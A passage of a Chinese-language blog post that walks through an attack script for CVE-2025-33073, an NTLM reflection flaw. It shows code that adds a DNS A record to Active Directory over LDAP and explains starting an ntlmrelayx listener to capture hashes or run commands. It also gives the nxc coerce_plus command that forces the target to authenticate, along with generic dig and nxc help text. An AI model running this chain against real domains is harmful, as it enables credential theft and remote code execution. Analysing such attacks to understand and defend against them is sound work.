                address = DNS_RPC_RECORD_A(dr['Data'])
                print_f('Record already exists and points to %s. Use --action modify to overwrite or --allow-multiple to override this' % address.formatCanonical())
                return False
    # If we are here, no A records exists yet
    record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp))
    record['Data'] = DNS_RPC_RECORD_A()
    record['Data'].fromCanonical(args.data)
    print_m('Adding extra record')
    c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_ADD, record.getData())]})
    print_operation_result(c.result)
else:
    node_data = {
        # Schema is in the root domain (take if from schemaNamingContext to be sure)
        'objectCategory': 'CN=Dns-Node,%s' % s.info.other['schemaNamingContext'][0],
        'dNSTombstoned': False,
        'name': target
    }
    record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp))
    record['Data'] = DNS_RPC_RECORD_A()
    record['Data'].fromCanonical(args.data)
    record_dn = 'DC=%s,%s' % (target, searchtarget)
    node_data['dnsRecord'] = [record.getData()]
    print_m('Adding new record')
    c.add(record_dn, ['top', 'dnsNode'], node_data)
    print_operation_result(c.result)

这段代码 将 我们 传递的 DNS相关值 设置为了 A记录。

Step 2 检查DNS记录是否添加成功

wait_for_dns_record(full_record, args.dns_ip, timeout=60)

返回类型 为 BOOL,如果超时60s 就 返回False。如果有响应并且没有超时就返回 True

执行

dig +short {record} @{dns_ip}

这句命令用于简洁地查询特定域名的 DNS 记录,并可以通过指定 DNS 服务器来获取结果。

  • +short:指示 dig 使用简短格式输出结果,只显示查询到的记录,不显示额外信息(如查询时间、响应状态等)。

  • {record}:要查询的域名或其对应的 DNS 记录类型(如 AMXTXT 等)。

  • @{dns_ip}:指定要查询的 DNS 服务器的 IP 地址。如果不指定,默认使用系统配置的 DNS 服务器。

dig 命令 介绍

dig(Domain Information Groper)是一个用于查询域名系统(DNS)的工具,它能够获取与域名相关的各种信息。以下是 dig 工具的详细介绍及其作用:

基本功能

  1. 查询 DNS 记录

    • dig 可以查询多种类型的 DNS 记录,如 A 记录(将域名映射到 IP 地址)、AAAA 记录(IPv6 地址)、MX 记录(邮件交换记录)、CNAME 记录(别名记录)、NS 记录(名称服务器记录)、TXT 记录(文本记录)等。

    • 例如,要查询域名 example.com 的 A 记录,可以使用命令:

      bash

      复制

      dig example.com A

      这将返回该域名对应的 IPv4 地址。

  2. 查看 DNS 服务器信息

    • 可以查询特定 DNS 服务器的信息,了解其版本、支持的功能等。

    • 例如,要查询 DNS 服务器 8.8.8.8 的版本信息,可以使用命令:

      bash

      复制

      dig CHAOS TXT version.bind @8.8.8.8

      这将返回 DNS 服务器的版本信息。

  3. 诊断 DNS 问题

    • dig 是一个强大的诊断工具,可以帮助管理员诊断 DNS 解析问题。例如,可以检查域名是否能够正确解析,或者是否存在 DNS 服务器配置问题。

    • 如果域名解析失败,dig 可以帮助确定问题出在哪个环节,如本地 DNS 服务器、上级 DNS 服务器还是域名本身。

  4. 测试 DNS 配置

    • 在对 DNS 配置进行更改后,可以使用 dig 来验证配置是否生效。

    • 例如,在更改域名的 A 记录后,使用 dig 查询该域名,查看是否返回了新的 IP 地址。

其他功能

  1. 支持多种查询选项

    • dig 支持多种查询选项,如指定 DNS 服务器、查询类型、启用或禁用递归查询等。

    • 例如,要指定使用 DNS 服务器 8.8.8.8 查询域名 example.com 的 MX 记录,可以使用命令:

      bash

      复制

      dig example.com MX @8.8.8.8
  2. 输出详细信息

    • dig 可以输出详细的查询结果,包括查询时间、响应状态、权威回答等信息。

    • 这有助于深入了解 DNS 查询过程和结果。

  3. 批量查询

    • 可以通过文件批量查询多个域名的 DNS 记录,方便对大量域名进行批量测试或分析。

    • 例如,可以创建一个包含多个域名的文件 domains.txt,然后使用命令:

      bash

      复制

      dig -f domains.txt

      这将依次查询文件中每个域名的 DNS 记录。

常见用途

  1. 网络管理

    • 网络管理员可以使用 dig 来管理和监控 DNS 服务器,确保域名解析的正确性和稳定性。

  2. 安全审计

    • 在安全审计过程中,dig 可以帮助检查域名的 DNS 配置是否符合安全要求,是否存在潜在的安全漏洞。

  3. 开发和测试

    • 开发人员和测试人员可以使用 dig 来测试应用程序的 DNS 解析功能,确保应用程序能够正确获取域名对应的 IP 地址。

  4. 故障排除

    • 当遇到域名解析问题时,dig 是一个不可或缺的工具,可以帮助快速定位和解决问题。

Step 3 启动ntlmrelayx监听器

ntlmrelay_proc = start_ntlmrelayx(args.target, args.cli_only, args.custom_command, args.socks)

time.sleep(5) # Give ntlmrelayx some time to start

该实现方法将会调用 “start_ntlmrelayx” 函数。并 启动子进程并与其进行交互

  • 有 cli_only 选项 custom_command选项值为NULL。将会获取被攻击对象的 uid:rid:lmhash:nthash

  • 有 cli_only 选项 custom_command选项值不为NULL。将会执行 指定命令,若有返回结果将会返回

  • 没有 cli_only 选项 将会把这些结果以 xterm 窗口里输出出来

  • 没有 cli_only 选项 有custom_command选项值 将会把指定命令的执行结果以 xterm 窗口里输出出来

Step 4 触发强制方法

run_petitpotam(args.target_ip, domain, user, args.password, args.cli_only, args.method)

执行

nxc smb {target_ip} -d {domain} -u {user} -p '{password}' -M coerce_plus -o M={method} L=\"{STATIC_DNS_RECORD}\"

  • cli_only 选项 有数据的话,就将 输出结果 输出到默认terminal(终端)中

  • cli_only 选项 为空的话->Flase 就会打开新的xterm窗口,将运行结果输出到这个窗口中

nxc 是 网络执行工具

┌──(root㉿192)-[/home/octal/桌面]
└─# nxc          
usage: nxc [-h] [--version] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose]
           [--debug] [--no-progress] [--log LOG] [-6] [--dns-server DNS_SERVER] [--dns-tcp]
           [--dns-timeout DNS_TIMEOUT]
           {smb,nfs,ldap,mssql,ssh,rdp,wmi,winrm,ftp,vnc} ...

     .   .
    .|   |.     _   _          _     _____
    ||   ||    | \ | |   ___  | |_  | ____| __  __   ___    ___
    \\( )//    |  \| |  / _ \ | __| |  _|   \ \/ /  / _ \  / __|
    .=[ ]=.    | |\  | |  __/ | |_  | |___   >  <  |  __/ | (__
   / /ॱ-ॱ\ \   |_| \_|  \___|  \__| |_____| /_/\_\  \___|  \___|
   ॱ \   / ॱ
     ॱ   ॱ

    The network execution tool
    Maintained as an open source project by @NeffIsBack, @MJHallenbeck, @_zblurx
    
    For documentation and usage examples, visit: https://www.netexec.wiki/

    Version : 1.3.0
    Codename: NeedForSpeed
    Commit  : Kali Linux
    

options:
  -h, --help            show this help message and exit

Generic:
  Generic options for nxc across protocols

  --version             Display nxc version
  -t, --threads THREADS
                        set how many concurrent threads to use
  --timeout TIMEOUT     max timeout in seconds of each thread
  --jitter INTERVAL     sets a random delay between each authentication

Output:
  Options to set verbosity levels and control output

  --verbose             enable verbose output
  --debug               enable debug level information
  --no-progress         do not displaying progress bar during scan
  --log LOG             export result into a custom file

DNS:
  -6                    Enable force IPv6
  --dns-server DNS_SERVER
                        Specify DNS server (default: Use hosts file & System DNS)
  --dns-tcp             Use TCP instead of UDP for DNS queries
  --dns-timeout DNS_TIMEOUT
                        DNS query timeout in seconds

Available Protocols:
  {smb,nfs,ldap,mssql,ssh,rdp,wmi,winrm,ftp,vnc}
    smb                 own stuff using SMB
    nfs                 own stuff using NFS
    ldap                own stuff using LDAP
    mssql               own stuff using MSSQL
    ssh                 own stuff using SSH
    rdp                 own stuff using RDP
    wmi                 own stuff using WMI
    winrm               own stuff using WINRM
    ftp                 own stuff using FTP
    vnc                 own stuff using VNC

总结

该攻击脚本并不复杂,我觉得非常非常非常的基础,并没有达到完全造轮子的程度。其中调用了

dnstool.py —— 添加DNS记录(内含静态记录)

dig —— 检查 DNS 是否生效

ntlmrelayx —— 启动ntlmrelayx监听器,来获取SMB相关信息

nxc —— 执行 nxc 的 smb 服务来触发 被攻击机 的 SMB 服务,从而获取SMB相关信息返回到 ntlmrelayx监听器 上。

相关链接

CVE-2025-33073:域内大杀器(附复现环境)

CVE-2025-33073的深入分析——NTLM 反射已死,NTLM 反射万岁!

0

评论区